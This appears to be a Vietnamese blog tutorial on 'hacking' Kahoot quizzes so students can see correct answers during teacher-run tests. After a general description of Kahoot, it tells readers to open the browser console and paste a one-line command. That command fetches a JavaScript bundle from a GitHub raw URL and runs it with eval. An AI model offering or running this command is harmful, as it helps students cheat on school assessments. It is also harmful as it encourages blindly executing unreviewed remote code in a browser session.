Top

Hướng dẫn Hack Kahoot đơn giản và dễ dàng

Nhiều bạn đang theo dõi Anonyviet chắc hẳn đang là sinh viên phải không? Do tình hình dịch còn diễn biến phức tạp, nhiều bạn còn đang phải học online và thường các giáo viên sẽ mở lớp chơi kahoot để kiểm tra bài. Nhưng nếu các bạn chưa nhớ bài hoặc các bạn muốn giành điểm cao thì hôm nay, mình sẽ hướng dẫn cách hack Kahoot đơn giản nhất nhé!

Kahoot là gì?

Kahoot là 1 công cụ học tập dành cho học sinh và giáo viên sử dụng phương thức truyền tải qua trò chơi. Trò chơi trên Kahoot là những câu hỏi trắc nghiệm, không chỉ là những câu hỏi lý thuyết đơn thuần, người dùng có thể tích hợp thên hình ảnh và video vào bài. Bởi vì là 1 trang web nên chỉ cần bạn có kết nối internet thì bạn có thể truy cập vào game thông qua trình duyệt.

Với tình hình học tập hiện nay thì Kahoot còn có thể sử dụng để học sinh hứng thú hơn trong việc học tập bằng cách sử dụng những quiz và cùng nhau đua điểm để có thể về nhất trong cuộc thi. Những thứ này đã gián tiếp làm học sinh hứng thú và có thể tăng khả năng cạnh tranh giữa các học sinh.

Kahoot không chỉ có live quiz để chơi tập thể mà giáo viên và học sinh còn có thể tham gia các cái challenge mà do người tổ chức tạo ra. Các Challenge này bạn có thể tham gia bất cứ lúc nào và người tổ chức có thể điều chỉnh thời gian để kết thúc quiz (chẳng hạn 1 ngày) và bạn có thể làm nó như bài tập về nhà cho học sinh.

Một số ưu điểm và nhược của Kahoot

Ưu điểm:

  • Có thể tích hợp hình ảnh và video vào quiz
  • Giúp người chơi chủ động tương tác hơn
  • Có thể đặt thời gian cho từng câu hỏi (mặc định 10 giây)
  • Trong khi người tổ chức chờ mọi người đăng nhập vào thì người tổ chức có thể mở video trên youtube chạy trong nền của ứng dụng Kahoot.
  • Có thể chạy trên trình duyệt hoặc ứng dụng riêng (Các bạn có thể tải chúng tại đây)
  • Có cộng đồng luôn luôn tạo câu hỏi mỗi ngày
  • Hoàn toàn không mất phí

Nhược điểm:

  • Chỉ có câu hỏi trắc nghiệm. Hoàn toàn không thể tạo các câu hỏi tự luận
  • So với các dạng ứng dụng khác tương tự, Kahoot có phụ thuộc vào mạng của người chủ host phòng
  • Dễ hack hơn so với 1 số ứng dụng tương tự

Hướng dẫn hack đáp án Kahoot

Như mình đã nói ở bên trên, Kahoot rất dễ để hack lấy đáp án và sau đây mình sẽ hướng dẫn các bạn cách hack đáp án nhé.

Lưu ý: Phương thức này chỉ hoạt động trên trình duyệt và cứ mỗi lần bạn đổi sang gamepin mới bạn cần thực hiện lại tất cả các bước từ đầu

Code này được lấy từ github và để tôn trọng quyền tác giả, mình sẽ để link dẫn tới link github của họ ở đây.

Bước 1: Các bạn vào game của bạn tại đây

Bước 2: Các bạn tìm QuizID ở trên trang của host hoặc giáo viên của bạn. Quizid sẽ có dạng https://play.kahoot.it/v2/?quizId=[dãy số bạn cần lấy]

Bước 3: Các bạn bật console ở trên trang chơi game của bạn bằng tổ hợp CTRL + SHIFT + J

Bước 4: Các bạn nhập đoạn code sau vào trong console ở trang game của bạn

fetch(“https://raw.githubusercontent.com/pxtrez/kaheet/main/dist/bundle.js”).then((r) => r.text().then((t) => eval(t)));

Bước 5: Các bạn nhập QuizID vào hộp thoại vừa mới xuất hiện và Enter

Bước 6: Đáp án sẽ hiện ra dưới dạng 1 ô có khung màu xanh lá cây đồng thời nó hiện cả các đáp án cho bạn (bình thường khi chơi sẽ không hiện)

Vậy là mình vừa hướng dẫn xong cách hack Kahoot rồi! Các bạn có thích mình làm 1 series về hack các phần mềm học tập không? Hãy để lại bình luận phía bên dưới để mình biết nhé! Các bạn có thể xem thêm cách hack OLM đơn giản tại đây

Bài viết đạt: 5/5 – (100 bình chọn)

Related Articles

Back to top button